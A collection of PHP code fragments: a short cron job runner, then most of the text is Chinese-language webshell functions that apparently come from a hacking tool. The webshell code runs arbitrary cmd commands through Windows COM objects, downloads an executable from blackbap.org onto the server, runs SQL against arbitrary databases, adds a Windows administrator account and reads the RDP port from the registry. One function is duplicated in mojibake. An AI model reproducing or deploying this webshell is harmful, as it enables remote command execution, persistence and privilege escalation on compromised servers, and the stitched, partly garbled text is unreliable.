protected function runWindows($job) { if (!$this->checkPHPBinary($job)) { return; } if (!extension_loaded("COM")) { $this->fail("Cannot run PHP binary, please enable COM extension"); } $WshShell = new COM("WScript.Shell"); chdir(dirname(__FILE__) . "/../../"); $command = sprintf("%s -f run_job.php %s %s", $sugar_config['cron']['php_binary'], $job->id, $this->getMyId()); $WshShell->Run($command, 0, false); // no window, don't wait for return $WshShell->Release(); }
function Com_h() { $object = isset($_GET['o']) ? $_GET['o'] : 'adodb'; print <<<END <div class="actall"><a href="?s=h&o=adodb">[ADODB.Connection]</a> <a href="?s=h&o=wscript">[WScript.shell]</a> <a href="?s=h&o=application">[Shell.Application]</a> <a href="?s=h&o=downloader">[Downloader]</a></div> <form method="POST" name="hform" id="hform" action="?s=h&o={$object}"> END; if ($object == 'downloader') { $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://blackbap.org/a.exe'; $Com_dpath = isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(__FILE__) . '/a.exe'); print <<<END <div class="actall">超连接 <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div> <div class="actall">下载到 <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div> <div class="actall"><input value="下载" type="submit" style="width:80px;"></div></form> END; if (!empty($_POST['durl']) && !empty($_POST['dpath'])) { echo '<div class="actall">'; $contents = @file_get_contents($_POST['durl']); if (!$contents) { echo '无法下载数据'; } else { echo File_Write($_POST['dpath'], $contents, 'wb') ? '下载成功' : '下载失败'; } echo '</div>'; } } elseif ($object == 'wscript') { $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'dir'; print <<<END <div class="actall">执行CMD命令 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div> <div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form> END; if (!empty($_POST['cmd'])) { echo '<div class="actall">'; $shell = new COM('wscript'); $exe = @$shell->exec("cmd.exe /c " . $cmd); $out = $exe->StdOut(); $output = $out->ReadAll(); echo '<pre>' . $output . '</pre>'; @$shell->Release(); $shell = NULL; echo '</div>'; } } elseif ($object == 'application') { $run = isset($_POST['run']) ? $_POST['run'] : 'cmd.exe'; $cmd = isset($_POST['cmd']) ? $_POST['cmd'] : 'copy c:\\boot.ini d:\\a.txt'; print <<<END <div class="actall">程序路径 <input type="text" name="run" value="{$run}" style="width:600px;"></div> <div class="actall">命令参数 <input type="text" name="cmd" value="{$cmd}" style="width:600px;"></div> <div class="actall"><input type="submit" value="执行" style="width:80px;"></div></form> END; if (!empty($_POST['run'])) { echo '<div class="actall">'; $shell = new COM('application'); echo @$shell->ShellExecute($run, '/c ' . $cmd) == '0' ? '执行成功' : '执行失败'; @$shell->Release(); $shell = NULL; echo '</div>'; } } elseif ($object == 'adodb') { $string = isset($_POST['string']) ? $_POST['string'] : ''; $sql = isset($_POST['sql']) ? $_POST['sql'] : ''; print <<<END <script language="javascript"> function hFull(i){ \tif(i==0 || i==5) return false; \tStr = new Array(12); \tStr[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\\db.mdb"; \tStr[2] = "Driver={Sql Server};Server=,1433;Database=DB;Uid=sa;Pwd=**"; \tStr[3] = "Driver={MySql};Server=;Port=3306;Database=DB;Uid=root;Pwd=**"; \tStr[4] = "Provider=MSDAORA.1;Password=密码;User ID=帐号;Data Source=服务名;Persist Security Info=True;"; \tStr[6] = "SELECT * FROM [TableName] WHERE ID<10"; \tStr[7] = "INSERT INTO [TableName](usr,psw) VALUES('yoco','pwd')"; \tStr[8] = "DELETE FROM [TableName] WHERE ID=1"; \tStr[9] = "UPDATE [TableName] SET USER='******' WHERE ID=1"; \tStr[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"; \tStr[11] = "DROP TABLE [TableName]"; \tStr[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"; \tStr[13] = "ALTER TABLE [TableName] DROP COLUMN PASS"; \tif(i<=4){document.getElementById('string').value = Str[i];}else{document.getElementById('sql').value = Str[i];} \treturn true; } </script> <div class="actall">连接字符串 <input type="text" name="string" id="string" value="{$string}" style="width:526px;"> <select onchange="return hFull(options[selectedIndex].value)"> <option value="0" selected>--连接示例--</option> <option value="1">Access连接</option> <option value="2">MsSql连接</option> <option value="3">MySql连接</option> <option value="4">Oracle连接</option> <option value="5">--SQL语法--</option> <option value="6">显示数据</option> <option value="7">添加数据</option> <option value="8">删除数据</option> <option value="9">修改数据</option> <option value="10">建数据表</option> <option value="11">删数据表</option> <option value="12">添加字段</option> <option value="13">删除字段</option> </select></div> <div class="actall">SQL命令 <input type="text" name="sql" id="sql" value="{$sql}" style="width:650px;"></div> <div class="actall"><input type="submit" value="执行" style="width:80px;"></div> </form> END; if (!empty($string)) { echo '<div class="actall">'; $shell = new COM('adodb'); @$shell->Open($string); $result = @$shell->Execute($sql); $count = $result->Fields->Count(); for ($i = 0; $i < $count; $i++) { $Field[$i] = $result->Fields($i); } echo $result ? $sql . ' 执行成功<br>' : $sql . ' 执行失败<br>'; if (!empty($count)) { while (!$result->EOF) { for ($i = 0; $i < $count; $i++) { echo htmlspecialchars($Field[$i]->value) . '<br>'; } @$result->MoveNext(); } } $shell->Close(); @$shell->Release(); $shell = NULL; echo '</div>'; } } return true; }
function winshell() { $nop = ' '; if ($_GET['winshell'] == 'wscript') { $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user'; $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe'; print <<<END <div class="actall"> <form action="?s=jk&winshell=wscript" method="POST"> <input type="hidden" name="do" id="do" value="do"><br> {$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -> CMD·��<br /> {$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="ִ��" style="width:80px;"> <br><br><br></form></div> END; if ($_POST['do'] == 'do') { $ww = $wcpth . " /c " . $wcmd; $phpwsh = new COM("Wscript.Shell") or die("����Shell.Wscript����ʧ��"); $phpexec = $phpwsh->exec($ww); $execoutput = $wshexec->stdout(); $result = $execoutput->readall(); echo $result; @$phpwsh->Release(); $phpwsh = NULL; } } elseif ($_GET['winshell'] == 'shelluser') { $wuser = $_POST['wuser'] ? $_POST['wuser'] : '******'; $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#'; print <<<END <div class="actall"> <form action="?s=jk&winshell=shelluser" method="POST"> <input type="hidden" name="do" id="do" value="do"><br> Shell.Users�������ӹ���Ա<br><br> {$nop}�½��û�����<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br> {$nop}���û����룺<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br> <input type="submit" value="����" style="width:80px;"> <br><br><br></form></div> END; if ($_POST['do'] = 'do') { $shell = new COM("Shell.Users"); $cmd = $shell->create($wuser); $cmd->changePassword($wpasw, ""); $cmd->setting["AccountType"] = 3; } } elseif ($_GET['winshell'] == 'regedit') { $regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber'; print <<<END <div class="actall"> <form action="?s=jk&winshell=regedit" method="POST"> <input type="hidden" name="do" id="do" value="do"><br> RegRead()������ȡע��������(Shell.Wscript����)<br><br> ע����·����<br> {$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br> <input type="submit" value="��ȡ����" style="width:80px;"> <br><br><br></form></div> END; if ($_POST['do'] == 'do') { $shell = new COM("WScript.Shell") or die("����Shell.Wscript����ʧ��"); try { $registry_proxystring = $shell->RegRead($regpath); } catch (Exception $e) { echo '����: ' . $e->getMessage(); } echo $registry_proxystring; } } else { $tip = "�ݲ��Ա����ܿ��õĿ�����Ϊ����֮һ<br>Webshell���ڷ���������ΪWindowsϵͳ<br>PHP��Ȩ����������ڷdz����ε�ʱ�����Գ��Ա�����<br></h5><br><br><br>"; print <<<END <div class="actall"><pre> <br><a href="?s=jk&winshell=wscript"> [ WScript���� ] </a><br><br> <h5>������ʹ��PHP����Windows�����е�Wscript������<br> WscriptΪ����cmd��������<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User���� ] </a><br><br> <h5>������ʹ��PHP����Windows�����е�Shell.user����<br> USER����ΪWindowsϵͳ�û�������������<br>{$tip}<a href="?s=jk&winshell=regedit"> [ ע������ȡ ] </a><br><br> <h5>������ʹ��PHP����Windows�����е�Shell.Wscript����<br> RegRead()������ȡϵͳע��������<br>{$tip}</pre></div> END; } }
function winshell() { $nop = ' '; if ($_GET['winshell'] == 'wscript') { $wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user'; $wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe'; print <<<END <div class="actall"> <form action="?s=jk&winshell=wscript" method="POST"> <input type="hidden" name="do" id="do" value="do"><br> {$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -> CMD路径<br /> {$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="执行" style="width:80px;"> <br><br><br></form></div> END; if ($_POST['do'] == 'do') { $ww = $wcpth . " /c " . $wcmd; $phpwsh = new COM("Wscript.Shell") or die("创建Shell.Wscript组件失败"); $phpexec = $phpwsh->exec($ww); $execoutput = $wshexec->stdout(); $result = $execoutput->readall(); echo $result; @$phpwsh->Release(); $phpwsh = NULL; } } elseif ($_GET['winshell'] == 'shelluser') { $wuser = $_POST['wuser'] ? $_POST['wuser'] : '******'; $wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#'; print <<<END <div class="actall"> <form action="?s=jk&winshell=shelluser" method="POST"> <input type="hidden" name="do" id="do" value="do"><br> Shell.Users组件添加管理员<br><br> {$nop}新建用户名:<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br> {$nop}新用户密码:<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br> <input type="submit" value="添加" style="width:80px;"> <br><br><br></form></div> END; if ($_POST['do'] = 'do') { $shell = new COM("Shell.Users"); $cmd = $shell->create($wuser); $cmd->changePassword($wpasw, ""); $cmd->setting["AccountType"] = 3; } } elseif ($_GET['winshell'] == 'regedit') { $regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber'; print <<<END <div class="actall"> <form action="?s=jk&winshell=regedit" method="POST"> <input type="hidden" name="do" id="do" value="do"><br> RegRead()函数读取注册表内容(Shell.Wscript组件)<br><br> 注册表路径:<br> {$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br> <input type="submit" value="读取内容" style="width:80px;"> <br><br><br></form></div> END; if ($_POST['do'] == 'do') { $shell = new COM("WScript.Shell") or die("创建Shell.Wscript组件失败"); try { $registry_proxystring = $shell->RegRead($regpath); } catch (Exception $e) { echo '内容: ' . $e->getMessage(); } echo $registry_proxystring; } } else { $tip = "据测试本功能可用的可能性为万分之一<br>Webshell所在服务器必须为Windows系统<br>PHP提权很灵活,但你在非常无奈的时候可以尝试本功能<br></h5><br><br><br>"; print <<<END <div class="actall"><pre> <br><a href="?s=jk&winshell=wscript"> [ WScript组件 ] </a><br><br> <h5>本功能使用PHP调用Windows组件中的Wscript组件。<br> Wscript为调用cmd命令组件<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User组件 ] </a><br><br> <h5>本功能使用PHP调用Windows组件中的Shell.user组件<br> USER组件为Windows系统用户操作相关组件<br>{$tip}<a href="?s=jk&winshell=regedit"> [ 注册表读取 ] </a><br><br> <h5>本功能使用PHP调用Windows组件中的Shell.Wscript组件<br> RegRead()函数读取系统注册表内容<br>{$tip}</pre></div> END; } }